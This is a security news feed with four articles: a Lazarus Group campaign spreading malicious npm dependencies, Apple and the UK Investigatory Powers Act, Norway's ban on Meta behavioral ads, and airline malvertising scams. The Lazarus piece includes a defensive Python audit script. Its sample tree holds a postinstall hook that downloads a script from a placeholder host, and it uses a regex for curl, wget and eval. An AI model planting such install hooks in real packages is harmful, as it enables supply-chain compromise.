	In a new security alert, GitHub warns that the Lazarus Group is compromising legitimate accounts or creating fake personas that pretend to be developers and recruiters on GitHub and social media.
</p>

<p>
	 
</p>

<p>
	"GitHub has identified a low-volume social engineering campaign that targets the personal accounts of employees of technology firms, using a combination of repository invitations and malicious npm package dependencies," explained the GitHub <a href="http://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#indicators" rel="external nofollow" target="_blank">security alert</a>.
</p>

<p>
	 
</p>

<p>
	These personas are used to contact and initiate conversations with developers and employees in the cryptocurrency, online gambling, and cybersecurity industries. These conversations commonly lead to another platform, which in <a href="https://www.bleepingcomputer.com/news/security/security-researchers-targeted-with-new-malware-via-job-offers-on-linkedin/" target="_blank" rel="external nofollow">past campaigns was WhatsApp</a>.
</p>

<p>
	 
</p>

<p>
	After establishing trust with the target, the threat actors invite them to collaborate on a project and clone a GitHub repository themed around media players and cryptocurrency trading tools.
</p>

<p>
	 
</p>

<p>
	However, GitHub says these projects pull in malicious npm dependencies that download further malware to targets' devices.
</p>

<p>
	 
</p>

<p>
	While GitHub only shared that the malicious npm packages act as a first-stage malware downloader, it referenced a <a href="https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/" rel="external nofollow" target="_blank">June report by Phylum</a> that goes into more detail regarding the malicious packages.
</p>

<p>
	 
</p>

<p>
	According to Phylum, the npm packages act as malware downloaders that connect to remote sites for additional payloads to execute on the infected machine.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="npm-connecting-to-remote-host.jpg" class="ipsImage" data-ratio="36.39" height="183" width="720" src="https://www.bleepstatic.com/images/news/malware/l/lazarus-github-campaign/npm-connecting-to-remote-host.jpg">
	</p>

	<div>
		<em>Downloading second-stage payload from a remote site. Source: Phylum</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	Unfortunately, the Phylum researchers could not obtain the second-stage payloads, so they could not see the final malware delivered to the device or analyze its behavior.
</p>

<p>
	 
</p>

<p>
	"Whatever the reason, it's certain this is the work of a reasonably sophisticated supply-chain threat actor," concluded the Phylum researchers.
</p>

<p>
	 
</p>

<p>
	"This attack in particular stands out due to its unique execution chain requirements: a specific installation order of two distinct packages on the same machine."
</p>

<p>
	 
</p>

<p>
	"Moreover, the presumed malicious components are kept out of sight, stored on their servers, and are dynamically dispatched during execution."
</p>
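<p>
	Before running <code>npm install</code> on a repository someone has invited you to collaborate on, the install hooks of every dependency are worth reading, because that is where a first-stage downloader of the kind Phylum describes executes. The audit below is an added example, not GitHub's or Phylum's tooling: it assumes the tree was populated with <code>npm install --ignore-scripts</code> (which writes the files but runs no lifecycle hooks) and walks every package.json under node_modules, flagging packages with install-time scripts and marking those that fetch or evaluate remote code. The sample tree it builds is constructed for the example.
</p>

```python
"""Audit an npm dependency tree for install-time scripts before letting them run.

Added example for this page, not GitHub's or Phylum's code. Populate the tree
with `npm install --ignore-scripts`, then run this before a normal install.
The sample tree at the bottom is constructed; the package names are invented.
"""
import json
import os
import re
import tempfile
from typing import Dict, List

# Hooks npm runs automatically during `npm install`; each can execute arbitrary code.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Crude but useful: commands that reach the network or evaluate code at install time.
NETWORK_OR_EVAL = re.compile(r"https?://|\bcurl\b|\bwget\b|node\s+-e\b|\beval\(|child_process", re.I)


def find_package_manifests(node_modules: str) -> List[str]:
    """Every package.json in the tree, including scoped (@org/name) and nested packages."""
    manifests = []
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" in files:
            manifests.append(os.path.join(root, "package.json"))
    return sorted(manifests)


def audit_tree(node_modules: str) -> List[Dict[str, str]]:
    """One finding per install hook; severity is 'high' when the command fetches or evals."""
    findings = []
    for path in find_package_manifests(node_modules):
        with open(path, encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except json.JSONDecodeError:
                continue  # not a manifest we can reason about; npm would reject it too
        scripts = manifest.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            findings.append({
                "package": f"{manifest.get('name', '?')}@{manifest.get('version', '?')}",
                "hook": hook,
                "command": cmd,
                "severity": "high" if NETWORK_OR_EVAL.search(cmd) else "review",
            })
    return findings


def build_sample_tree() -> str:
    """Constructed node_modules: one benign package, one native build, one downloader."""
    root = tempfile.mkdtemp(prefix="nm-")
    packages = {
        "left-pad": {"name": "left-pad", "version": "1.3.0"},
        "node-gyp-thing": {"name": "node-gyp-thing", "version": "0.1.0",
                           "scripts": {"install": "node-gyp rebuild"}},
        "@media/player-utils": {"name": "@media/player-utils", "version": "2.4.1",
                                "scripts": {"postinstall": "node -e \"require('https').get("
                                            "'https://cdn.example.invalid/s.js', r=>r.pipe(process.stdout))\""}},
    }
    for rel, manifest in packages.items():
        pkg_dir = os.path.join(root, "node_modules", rel)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return os.path.join(root, "node_modules")


if __name__ == "__main__":
    for f in audit_tree(build_sample_tree()):
        print(f"[{f['severity']}] {f['package']} {f['hook']}: {f['command']}")
```

<p>
	A native module that runs <code>node-gyp rebuild</code> lands in the "review" bucket, a postinstall that pulls a script over HTTPS is "high". The audit cannot see the second stage itself, since Phylum notes the payload is fetched from the attackers' servers at run time and only when the right pair of packages is present, but the hook that does the fetching is always in the manifest, and that is enough to stop before it runs.
</p>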

<p>
	 
</p>

<p>
	GitHub says it has suspended all npm and GitHub accounts associated with the campaign and published a <a href="https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#indicators" rel="external nofollow" target="_blank">complete list of indicators</a> covering the domains, GitHub accounts, and npm packages involved.
</p>

<p>
	 
</p>

<p>
	The company also emphasizes that no GitHub or npm systems were compromised during this campaign.
</p>

<p>
	 
</p>

<p>
	This campaign is similar to a Lazarus campaign in January 2021, when the threat actors <a href="https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-targeting-security-researchers-with-malware-0-days/" target="_blank" rel="external nofollow">targeted security researchers</a> in social engineering attacks using elaborate fake "security researcher" social media personas to infect targets with malware.
</p>

<p>
	 
</p>

<p>
	This was done by convincing the researchers to collaborate on vulnerability development by distributing malicious Visual Studio projects for alleged vulnerability exploits that installed a custom backdoor.
</p>

<p>
	 
</p>

<p>
	A <a href="https://www.bleepingcomputer.com/news/security/google-north-korean-hackers-target-security-researchers-again/" target="_blank" rel="external nofollow">similar campaign</a> was conducted in March 2021 when the hackers created a website for a fake company named SecuriElite to infect researchers with malware.
</p>

<h2>
	Other past Lazarus attacks
</h2>

<p>
	North Korean hackers have a long history of targeting cryptocurrency companies and developers to steal assets to fund their country's initiatives.
</p>

<p>
	 
</p>

<p>
	Lazarus began targeting cryptocurrency users by spreading <a href="https://www.bleepingcomputer.com/news/security/us-warns-of-lazarus-hackers-using-malicious-cryptocurrency-apps/" target="_blank" rel="external nofollow">trojanized cryptocurrency wallets</a> and <a href="https://www.bleepingcomputer.com/news/security/us-shares-info-on-north-korean-malware-used-to-steal-cryptocurrency/" target="_blank" rel="external nofollow">trading apps</a> to steal users' crypto wallets and the funds within them.
</p>

<p>
	 
</p>

<p>
	In April 2022, the U.S. Treasury and the FBI <a href="https://www.bleepingcomputer.com/news/security/fbi-links-largest-crypto-hack-ever-to-north-korean-hackers/" target="_blank" rel="external nofollow">linked the Lazarus group</a> to <a href="https://www.bleepingcomputer.com/news/cryptocurrency/620-million-in-crypto-stolen-from-axie-infinitys-ronin-bridge/" target="_blank" rel="external nofollow">the theft of over $617 million</a> worth of Ethereum and USDC tokens from the blockchain-based game Axie Infinity.
</p>

<p>
	 
</p>

<p>
	It was later disclosed that, as part of this attack, the threat actors sent a <a href="https://www.bleepingcomputer.com/news/security/hackers-stole-620-million-from-axie-infinity-via-fake-job-interviews/" target="_blank" rel="external nofollow">malware-laced PDF file</a> posing as a lucrative job offer to one of the blockchain's engineers.
</p>

<p>
	 
</p>

<p>
	The use of fake employment opportunities to deliver malware was also used in a 2020 campaign called "<a href="https://www.clearskysec.com/operation-dream-job/" rel="external nofollow" target="_blank">Operation Dream Job</a>" that targeted employees in prominent defense and aerospace companies in the US.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17206</guid><pubDate>Fri, 21 Jul 2023 03:30:48 +0000</pubDate></item><item><title>Apple threatens to pull iMessage and FaceTime from UK</title><link>https://nsaneforums.com/news/security-privacy-news/apple-threatens-to-pull-imessage-and-facetime-from-uk-r17195/</link><description><![CDATA[<p>
	Apple has threatened to remove popular communication services from the UK market if the government carries out planned amendments to the <a href="https://www.neowin.net/news/uk-investigatory-powers-bill-passed---isp-logging-without-a-warrant-imminent/" rel="external nofollow">Investigatory Powers Act (IPA) 2016</a>. The company says it will remove iMessage and <a href="https://www.neowin.net/news/apple039s-arvr-headset-may-run-realityos-giving-facetime-exciting-new-features/" rel="external nofollow">FaceTime</a> from the UK instead of weakening their security.
</p>

<p>
	 
</p>

<p>
	Under adjustments to the law, tech companies would be forced to show the Home Office any security features and have them approved before releasing them to the public. If the Home Office doesn’t like the feature, it can make the company disable the security feature in question immediately, without telling the public.
</p>

<p>
	 
</p>

<p>
	According to the BBC, the Home Office already has these powers but there has to be a review and there can be an independent oversight process. Tech firms also have the ability to make an appeal before they make any change.
</p>

<p>
	 
</p>

<p>
	Under the adjustments to the law, tech companies would have to disable the features right away. In its current state, there is still a high level of secrecy around demands made by the Home Office and it’s not known how many have been issued or complied with.
</p>

<p>
	 
</p>

<p>
	Apple has made the following points about the proposed amendments:
</p>

<p>
	 
</p>

<ul>
	<li>
		It would not make changes to security features specifically for one country that would weaken a product for all users.
	</li>
	<li>
		Some changes would require issuing a software update, so they could not be made secretly.
	</li>
	<li>
		The proposals "constitute a serious and direct threat to data security and information privacy" and would affect people outside the UK.
	</li>
</ul>

<p>
	 
</p>

<p>
	If the law does go ahead, it will be interesting to see whether Apple really follows through on its threat to pull the services from the UK. Its blue-bubble iMessage feature is regularly held up as a soft-power tactic <a href="https://www.neowin.net/news/apple039s-iphone-is-surprisingly-common-in-the-five-eyes-countries/" rel="external nofollow">Apple uses to shame younger, more impressionable people</a> into choosing an iPhone over an Android phone.
</p>

<p>
	 
</p>

<p>
	Source: <a href="https://www.bbc.co.uk/news/technology-66256081" rel="external nofollow">BBC News</a>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/apple-threatens-to-pull-imessage-and-facetime-from-uk/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17195</guid><pubDate>Thu, 20 Jul 2023 20:15:04 +0000</pubDate></item><item><title>Facebook behavioral ads banned by Norwegian privacy watchdog</title><link>https://nsaneforums.com/news/security-privacy-news/facebook-behavioral-ads-banned-by-norwegian-privacy-watchdog-r17169/</link><description><![CDATA[<p>
	<span style="font-size:14px;">The Norwegian Data Protection Authority (DPA), the country's data privacy watchdog, has banned behavioral advertising on Meta's Facebook and Instagram social networks.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The ban prohibits the practice unless the company secures explicit consent from Norwegian users to process their personal data.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to the Norwegian DPA, Meta monitors users extensively, tracking their activities across its platforms.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The company uses users' content preferences, the information they post on Facebook and Instagram, and their location data to build personalized profiles for targeted advertising, a practice commonly known as behavioral advertising.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"The Norwegian Data Protection Authority considers that the practice of Meta is illegal and is therefore imposing a temporary ban of behavioural advertising on Facebook and Instagram," the data protection agency <a href="https://www.datatilsynet.no/en/news/aktuelle-nyheter-2023/temporary-ban-of-behavioural-advertising-on-facebook-and-instagram/" rel="external nofollow">said</a>.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"The Norwegian Data Protection Authority does not ban personalised advertising on Facebook or Instagram as such. The decision does not for example stop Meta from targeting advertising based on information a user put in their bio, such as place of residence, gender and age, or based on interests a user has provided themselves."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Failure to comply with the decision would come with a daily penalty of roughly $100,000, as enforced by the Norwegian DPA.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The ban is temporary, running for three months from August 4th, because the agency's authority is limited to temporary measures; the privacy watchdog says it is considering referring the matter to the European Data Protection Board (EDPB) to extend the decision beyond the initial three months.</span>
</p>

<p>
	 
</p>

<p>
	<img alt="Datatilsynet%20Facebook%20behavioral%20a" class="ipsImage" data-ratio="75.10" height="367" width="720" src="https://www.bleepstatic.com/images/news/u/1109292/2023/Datatilsynet%20Facebook%20behavioral%20ads%20ban%20tweet.png">
</p>

<h2>
	<span style="font-size:14px;">€390 million behavioral advertising fine</span>
</h2>

<p>
	<span style="font-size:14px;">In December 2022, the Irish Data Protection Commission (DPC) <a href="https://www.bleepingcomputer.com/news/security/meta-to-fight-390-million-fine-for-breaching-eu-data-privacy-laws/" rel="external nofollow">fined Meta a total of €390 million (~$438 million)</a> for conducting illegal behavioral advertising by forcing Facebook and Instagram users to consent to personal data processing for targeted advertising.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The Irish DPC also ordered Meta to bring its data processing operations into compliance with the GDPR within three months.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">However, despite making some changes to comply with the Irish DPC's December ruling, the Court of Justice of the European Union (CJEU) <a href="https://curia.europa.eu/juris/document/document.jsf?text=&amp;docid=275125&amp;pageIndex=0&amp;doclang=EN&amp;mode=req&amp;dir=&amp;occ=first&amp;part=1&amp;cid=1652408" rel="external nofollow">found</a> that Meta's GDPR approach to behavioral advertising is still largely illegal.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Since then, Meta has made certain changes, but a fresh decision from the Court of Justice of the European Union (curia.europa.eu) has stated that Meta's behavioural advertising still does not comply with the law," the Norwegian watchdog said.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Therefore, the Norwegian Data Protection Authority is now taking action by imposing a temporary ban."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Meta's non-compliance aligns with the company's statement after being fined in December. The company <a href="https://www.bleepingcomputer.com/news/security/meta-to-fight-390-million-fine-for-breaching-eu-data-privacy-laws/" rel="external nofollow">rejected DPC's findings</a> and said it would appeal the fines, blaming the decision on a "lack of regulatory clarity."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Facebook and Instagram are inherently personalised, and we believe that providing each user with their own unique experience – including the ads they see – is a necessary and essential part of that service," Meta said.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">In November, Meta <a href="https://www.bleepingcomputer.com/news/security/meta-fined-265m-for-not-protecting-facebook-users-data-from-scrapers/" rel="external nofollow">was hit with another €265 million</a> ($275.5 million) fine by the Irish data watchdog for failing to protect Facebook users' data from scrapers after <a href="https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/" rel="external nofollow">data linked to 533 million</a> Facebook accounts leaked on a hacker forum.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/technology/facebook-behavioral-ads-banned-by-norwegian-privacy-watchdog/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">17169</guid><pubDate>Wed, 19 Jul 2023 14:12:23 +0000</pubDate></item><item><title>Scammers are using Google results to target desperate travelers</title><link>https://nsaneforums.com/news/security-privacy-news/scammers-are-using-google-results-to-target-desperate-travelers-r17157/</link><description><![CDATA[<p>
	<span style="font-size:22px;">Need to rebook a canceled flight? Beware of ‘malvertising.’</span>
</p>

<p>
	 
</p>

<p>
	After sitting on the runway for an extended wait, Shmuli Evers’s plane returned to the terminal at John F. Kennedy Airport. The weather earlier this week was too dangerous to fly, so his 7 a.m. flight to Florida would not be taking off. Immediately, the line for Delta’s in-house customer service began to stretch through the airport, filled with passengers from his flight. Evers figured he could avoid the wait by calling Delta’s customer service hotline, so he turned to Google.
</p>

<p>
	 
</p>

<p>
	He dialed the first phone number the search engine listed. The automated voice at the number Evers called claimed to be a central customer service desk for multiple airlines, although Delta’s name was never explicitly mentioned. That was the first sign something wasn’t right.
</p>

<p>
	 
</p>

<p>
	Evers had accidentally called a number added to Google by potential scammers in place of the actual Delta customer service number. Like other consumers in recent years, he didn’t know that search results can be manipulated by scammers. It’s called “malvertising.”
</p>

<p>
	 
</p>

<p>
	After many redirections to international numbers, he began speaking with a friendly voice who said he was a Delta representative. The “representative” asked Evers for his name and flight itinerary and said they had canceled his existing flight manually. He then directed Evers to a flight at Newark Liberty Airport, which he could book for five times the original price of his ticket.
</p>

<p>
	 
</p>

<p>
	To confirm the ticket, he texted Evers from a different number than he had called from. Evers became suspicious and asked where the representative was located. When the representative responded that he was two hours south of Manhattan in Rochester — which is actually north of the city, on the shore of Lake Ontario — Evers suspected this was a scam and hung up. The supposed help desk employee was persistent, continuing to send text messages about how hard he had worked to find this flight and how all Evers needed to do was provide his payment information to get to Florida on time.
</p>

<p>
	 
</p>

<p>
	“I just ignored it from there. Go away,” Evers said. “That’s when … I looked up the number and I realized that Delta was not the only one that had their listing created, most likely, by scammers.”
</p>

<p>
	 
</p>

<p>
	<a href="https://twitter.com/Shmuli/status/1680669938468499458" rel="external nofollow">Evers's Twitter thread</a> documenting the scam.
</p>

<p>
	Evers posted several tweets Sunday morning to relay his experience, and in creating a now-viral thread, published screenshots of Google results that appear to show incorrect phone numbers for several other airlines; Evers found that Southwest Airlines, American Airlines, Air France and more had been affected.
</p>

<p>
	 
</p>

<p>
	“We do not tolerate this misleading activity, and are constantly monitoring and evolving our platforms to combat fraud and create a safe environment for users and businesses,” Google said in a statement emailed to The Washington Post. “Our teams have already begun reverting the inaccuracies, suspending the malicious accounts involved, and applying additional protections to prevent further abuse.”
</p>

<p>
	 
</p>

<p>
	In a Tuesday search The Post conducted, these numbers had all been replaced with their accurate counterparts listed on the airlines’ websites. However, while searching for “Delta Air Lines” using the Safari app, The Post found two potentially fraudulent websites with sponsored ads on Google that appeared above the official Delta website in search results.
</p>

<p>
	 
</p>

<p>
	Scams in which criminals alter the contact information of major companies are relatively common and have targeted a number of travel-based industries in recent years, including rental car companies and airlines, said Amy Nofziger, the director of fraud victim support at AARP.
</p>

<p>
	 
</p>

<p>
	Since Sunday, Evers said, other Twitter users have reached out to share stories of similar incidents. “There’s people that said, ‘This scam cost me hundreds of dollars and thousands of dollars,’” he said.
</p>

<p>
	 
</p>

<p>
	Here are the best ways to identify this type of scam and prevent it from happening to you.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>How do scammers alter Google search results?</strong></span><br />
	<br />
	Google users can contribute information to search results, which can lead to scammers replacing official business phone numbers with false ones.
</p>

<p>
	 
</p>

<p>
	They may do this by contributing information to a business’s page by acting as that business online. Until someone realizes that the phone number is incorrect, the false number will remain on the Google business page.
</p>

<p>
	 
</p>

<p>
	Nofziger says potential scammers can place false contact information in other ways, too; they may impersonate an official company account on social media or reply to posts on internet complaint boards with this information.
</p>

<p>
	 
</p>

<p>
	Search results for airline customer service numbers have been a point of contention between search engine companies and scammers for years. In 2021, ads at the top of Google search results for queries like “United customer service” surfaced fake sites that were essentially paying Google to defraud its users. The fake ads appeared above the “infobox” with the airline’s real phone number and sometimes linked to sites hosted by Google, adding to their credibility.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>What red flags suggest I’m being scammed?</strong></span>
</p>

<p>
	<br />
	If you are unsure whether a company’s phone number is correct, visit their official website to confirm.
</p>

<p>
	 
</p>

<p>
	Official websites often have the most reliable information on how to contact the airline, including through live chat, phone and email. These sites tend to have a “.com” ending for U.S.-based businesses. Nofziger recommends avoiding a potential scam by repeatedly verifying the phone number listed on the official website.
</p>

<p>
	 
</p>

<p>
	Red flags may also appear in the price point and payment method. Prices should not be significantly higher than what you originally paid — in Evers’ case, five times the original price. You should also be wary if an individual asks you to pay via prepaid gift card, wire transfer, Venmo or cryptocurrency.
</p>

<p>
	 
</p>

<p>
	“In a lot of our situations we hear from victims who say they were offered a good deal if they paid via a certain way,” Nofziger said. “The majority of the time, the criminals were asking to be paid by prepaid gift card. The reason they’re asking for those forms of payment is because they are quick and easily accessible to consumers, and they’re quick and easy and accessible to criminals to download the money off of that card and steal it from you.”
</p>

<p>
	 
</p>

<p>
	Although these situations can be stressful, Nofziger advises to take a deep breath and “trust your gut” before contacting customer service. Scams like this exploit the sense of urgency travelers feel when their flight is canceled. If a salesperson or representative is pressuring you to act quickly, it may be indicative of a scam.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>Who should I call if I get scammed?</strong></span>
</p>

<p>
	<br />
	Nofziger emphasized the importance of reporting a scam if you encounter one. Airlines may open investigations into these cases, and Google can edit the information on its business pages and suspend bad actors’ accounts.
</p>

<p>
	 
</p>

<p>
	“Whenever we become aware of an alleged scam targeting our customers, including in this situation, we immediately conduct an investigation. Using the facts gained from an investigation, when able, we can then address each unique situation as appropriate with the necessary legal means at our disposal,” said Drake Castañeda, a corporate communications official at Delta.
</p>

<p>
	 
</p>

<p>
	If you live in the United States, you can report scams and fraud to the Federal Trade Commission or to the FBI’s Internet Crime Complaint Center. You may also contact the AARP Fraud Watch Network Helpline, which is available to people of all ages regardless of AARP membership, at 877-908-3360. Posting about it online, as Evers did, is also a useful way to warn other consumers.
</p>

<p>
	 
</p>

<p>
	“It does sometimes take one person to have this experience happen to them for other people to realize that might happen to them as well,” said Nofziger. “Anywhere that you can report it and share the information to help other people not be a victim and to educate is fantastic. If you have a voice, use it.”
</p>

<p>
	 
</p>

<p>
	Southwest Airlines, American Airlines, ITA Airways, Qantas Airways and Turkish Airlines did not respond to The Post’s requests for comment. Air France confirmed its correct U.S. phone number is 800-237-2747 but declined to comment further.
</p>

<p>
	 
</p>

<p>
	<em>Jeremy Merrill contributed to this report.</em>
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.washingtonpost.com/travel/tips/airline-flight-booking-scam-malvertising/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">17157</guid><pubDate>Wed, 19 Jul 2023 01:03:00 +0000</pubDate></item></channel></rss>
